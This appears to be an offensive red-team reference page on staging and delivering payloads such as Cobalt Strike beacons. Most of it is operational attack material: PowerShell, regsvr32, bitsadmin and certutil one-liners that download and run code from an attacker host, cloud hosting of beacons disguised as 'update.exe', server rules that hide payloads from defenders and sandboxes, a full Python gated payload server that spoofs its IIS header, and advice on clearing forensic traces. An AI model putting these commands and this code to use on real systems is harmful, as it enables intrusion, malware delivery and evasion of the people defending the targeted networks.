Payload Staging Infrastructure

Hosting and delivering payloads to targets. Covers web delivery, cloud hosting, and payload gating to prevent blue team retrieval.


CS: Scripted Web Delivery

Host a payload on the team server and generate a one-liner for the target to download and execute.

# Attacks > Scripted Web Delivery
# Type: bitsadmin, exe, powershell, python, regsvr32
 
# PowerShell one-liner (generated by CS)
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://<teamserver>/a'))"
 
# Regsvr32 (AppLocker bypass — Microsoft-signed binary)
regsvr32 /s /n /u /i:http://<teamserver>/a scrobj.dll
 
# bitsadmin (downloads to disk)
bitsadmin /transfer update /download /priority high http://<teamserver>/payload.exe C:\Users\Public\update.exe & C:\Users\Public\update.exe

Warning

CS web delivery binds on the team server IP. If the team server is not directly accessible, use a redirector (see a. Infrastructure Hardening).


Simple Web Servers

Quick payload hosting on the attacker machine.

# Python
python3 -m http.server 80
python3 -m http.server 8080 --directory /path/to/payloads
 
# PHP
php -S 0.0.0.0:80
 
# Ruby
ruby -run -e httpd . -p 80
 
# Nginx (more resilient for real ops)
# /etc/nginx/sites-enabled/payload.conf
server {
    listen 80;
    server_name cdn.example.com;
    root /var/www/payloads;
    autoindex off;
}

Cloud-Based Hosting

S3 Bucket

# Create bucket and upload payload
# Note: buckets created since April 2023 have Block Public Access enabled and ACLs disabled by default,
# so --acl public-read fails unless both are changed; the presigned URL below works either way
aws s3 mb s3://legit-update-cdn
aws s3 cp beacon.exe s3://legit-update-cdn/update.exe --acl public-read
 
# Generate presigned URL (time-limited access)
aws s3 presign s3://legit-update-cdn/update.exe --expires-in 3600
 
# Download on target (substitute the presigned URL if the object is not public)
certutil -urlcache -split -f "https://legit-update-cdn.s3.amazonaws.com/update.exe" C:\Users\Public\update.exe

Azure Blob Storage

# Create storage account and container
az storage account create -n legitcdnstorage -g rg-ops --sku Standard_LRS
az storage container create -n payloads --account-name legitcdnstorage --public-access blob
 
# Upload
az storage blob upload --account-name legitcdnstorage -c payloads -n update.exe -f beacon.exe
 
# URL: https://legitcdnstorage.blob.core.windows.net/payloads/update.exe

GitHub Releases / Gists

# Secret gist for script-based payloads (gh creates gists as secret unless --public is given;
# secret gists are unlisted but still readable by anyone with the URL)
gh gist create payload.ps1
 
# GitHub release for binary payloads
gh release create v1.0 beacon.exe --repo user/legit-repo --notes "update"

Cloud-hosted payloads benefit from trusted domains — *.s3.amazonaws.com, *.blob.core.windows.net, github.com are often allowlisted.


Payload Gating

Restrict who can download your payload to prevent blue team retrieval and sandbox analysis.

User-Agent Filtering (Apache)

# /etc/apache2/sites-enabled/payload.conf
<VirtualHost *:80>
    ServerName cdn.example.com
    DocumentRoot /var/www/payloads
 
    # Only serve to browser-looking User-Agents (Chromium Edge sends "Edg/", legacy Edge "Edge/")
    # The UA is client-controlled and sandboxes spoof browser UAs, so treat this as a first
    # filter, not a boundary; returning 404 instead of 403 ([R=404,L]) blends in better
    RewriteEngine On
    RewriteCond %{HTTP_USER_AGENT} !(MSIE|Trident|Edg|Chrome) [NC]
    RewriteRule .* - [F,L]
</VirtualHost>

Geofencing (IP-Based)

# Only serve to target country/ASN IP ranges (Apache 2.4; multiple Require ip lines are OR'd)
# Match on the target's egress addresses (NAT, proxy, cloud web gateway): that is what the server sees
<Directory /var/www/payloads>
    Require ip 203.0.113.0/24
    Require ip 198.51.100.0/24
</Directory>
 
# iptables — restrict to specific source IPs (order matters: ACCEPT before the catch-all DROP)
iptables -A INPUT -p tcp --dport 80 -s <target_range> -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP

Time-Based Gating

# Only serve during business hours. %{TIME_HOUR} is the server's local time, so set the server
# (or Apache's TZ environment) to the target's timezone. Hours are zero-padded, which is why the
# string comparisons below are safe.
RewriteEngine On
RewriteCond %{TIME_HOUR} <08 [OR]
RewriteCond %{TIME_HOUR} >18
RewriteRule .* - [F,L]

One-Time Download (mod_rewrite + Flag File)

# Serve the payload once per source address, then refuse (the flag file is keyed on REMOTE_ADDR)
RewriteEngine On
RewriteCond /var/www/flags/%{REMOTE_ADDR}.flag -f
RewriteRule .* - [F,L]
 
# The flag must be created after the first successful download, e.g. by a CGI wrapper that
# serves the file, or by a script tailing the access log for a 200 on the payload path
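The four gates above are shown as separate Apache fragments; the following is an added example (not code from the original page) of a minimal Python payload server that applies all of them in one decision function before returning a file: User-Agent allowlist, source-IP allowlist, a business-hours window evaluated in the target's timezone, and serve-once per source address via the same per-IP flag files the mod_rewrite rule checks. It also replaces the default `BaseHTTP/Python` Server header. The IP ranges, timezone, directories and payload path are placeholders to be replaced with the engagement's own values.

```python
import ipaddress
import os
import re
from datetime import datetime, timedelta, timezone
from http.server import BaseHTTPRequestHandler, HTTPServer

# --- Gating policy: placeholder values, replace with the engagement's own ---
ALLOWED_UA = re.compile(r"MSIE|Trident|Edg|Chrome", re.IGNORECASE)   # Chromium Edge sends "Edg/"
ALLOWED_NETS = [ipaddress.ip_network(n) for n in ("203.0.113.0/24", "198.51.100.0/24")]
BUSINESS_HOURS = (8, 18)          # serve only while 08:00 <= target-local hour < 18:00
try:
    from zoneinfo import ZoneInfo
    TARGET_TZ = ZoneInfo("Europe/Berlin")        # the target's zone, not the server's
except Exception:                                 # no tz database on this host
    TARGET_TZ = timezone(timedelta(hours=1))      # fall back to a fixed offset
PAYLOAD_DIR = "/var/www/payloads"
FLAG_DIR = "/var/www/flags"
PAYLOAD_PATHS = {"/update.exe"}   # the only URLs that ever return a body


def gate(user_agent, src_ip, now, flag_dir=FLAG_DIR):
    """Return None when the request may be served, otherwise a short reason.
    Callers answer every refusal with an identical 404 so the reason never leaks."""
    if not user_agent or not ALLOWED_UA.search(user_agent):
        return "user-agent"
    try:
        addr = ipaddress.ip_address(src_ip)
    except ValueError:
        return "bad-ip"
    if not any(addr in net for net in ALLOWED_NETS):
        return "ip-range"
    hour = now.astimezone(TARGET_TZ).hour        # evaluate the window in the target's timezone
    if not BUSINESS_HOURS[0] <= hour < BUSINESS_HOURS[1]:
        return "time-window"
    if os.path.exists(os.path.join(flag_dir, f"{src_ip}.flag")):
        return "already-served"
    return None


def mark_served(src_ip, flag_dir=FLAG_DIR):
    """Drop the per-address flag so the next request from src_ip is refused."""
    os.makedirs(flag_dir, exist_ok=True)
    with open(os.path.join(flag_dir, f"{src_ip}.flag"), "w") as fh:
        fh.write(datetime.now(timezone.utc).isoformat())


class GatedHandler(BaseHTTPRequestHandler):
    # Default Server header is "BaseHTTP/0.6 Python/3.x"; present something boring instead
    server_version = "Microsoft-IIS/10.0"
    sys_version = ""

    def _deny(self):
        # Same answer for unknown paths, failed gates and HEAD probes: a plain 404
        body = b"<h1>Not Found</h1>"
        self.send_response(404)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_HEAD(self):
        self._deny()

    def do_GET(self):
        path = self.path.split("?", 1)[0]
        if path not in PAYLOAD_PATHS:
            return self._deny()                   # no listing, no other files
        src = self.client_address[0]
        reason = gate(self.headers.get("User-Agent"), src, datetime.now(timezone.utc))
        if reason:
            self.log_message("denied %s (%s)", src, reason)
            return self._deny()
        with open(os.path.join(PAYLOAD_DIR, path.lstrip("/")), "rb") as fh:
            data = fh.read()
        mark_served(src)                          # one download per source address
        self.send_response(200)
        self.send_header("Content-Type", "application/octet-stream")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 80), GatedHandler).serve_forever()
```

Run it on the redirector or on the host that terminates the client connection: behind a redirector, `client_address` is the redirector's IP, so either run the gate there or pass the real source through a header you control and trust only from the redirector's address. The flag is written only after the file is read successfully, so a request that fails a gate never consumes the one-shot.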

Payload Hosting Checklist

  • Payload not directly on team server (use redirector)
  • HTTPS with valid certificate
  • User-Agent filtering to block scanners/sandboxes
  • Geofencing if target IP ranges are known
  • Payloads named to look legitimate (update.exe, setup.msi, config.dll)
  • Remove payloads after delivery window closes
  • Server headers stripped or spoofed (no Python/SimpleHTTPServer)
  • No directory listing enabled

Download One-Liners (Target-Side)

Quick reference for downloading hosted payloads on the target. See also: Download One-Liners.

# PowerShell — in-memory
IEX (New-Object Net.WebClient).DownloadString('http://<host>/payload.ps1')
IEX (iwr http://<host>/payload.ps1 -UseBasicParsing)
 
# PowerShell — to disk
(New-Object Net.WebClient).DownloadFile('http://<host>/beacon.exe','C:\Users\Public\update.exe')
iwr http://<host>/beacon.exe -OutFile C:\Users\Public\update.exe
 
# certutil
certutil -urlcache -split -f http://<host>/beacon.exe C:\Users\Public\update.exe
certutil -urlcache -split -f http://<host>/beacon.exe C:\Users\Public\update.exe & del /f certutil.log
 
# bitsadmin
bitsadmin /transfer job /download /priority high http://<host>/beacon.exe C:\Users\Public\update.exe
 
# curl (Win10+)
curl http://<host>/beacon.exe -o C:\Users\Public\update.exe

Note

OPSEC:

  • certutil downloads show up in process-creation logs (Event 4688 when command-line auditing is on, Sysmon Event 1) and leave entries in the certutil URL cache (certutil -urlcache * delete clears it); commonly detected
  • PowerShell DownloadString + IEX puts the fetched script through AMSI and into Script Block Logging (Event 4104)
  • bitsadmin leaves a BITS job queued if the transfer does not complete; clean up with bitsadmin /cancel job, and note that BITS activity is recorded in the Microsoft-Windows-Bits-Client operational log
  • Corporate proxies log full URLs; presigned URLs with a short TTL limit how long a logged URL remains usable for retrieval by the blue team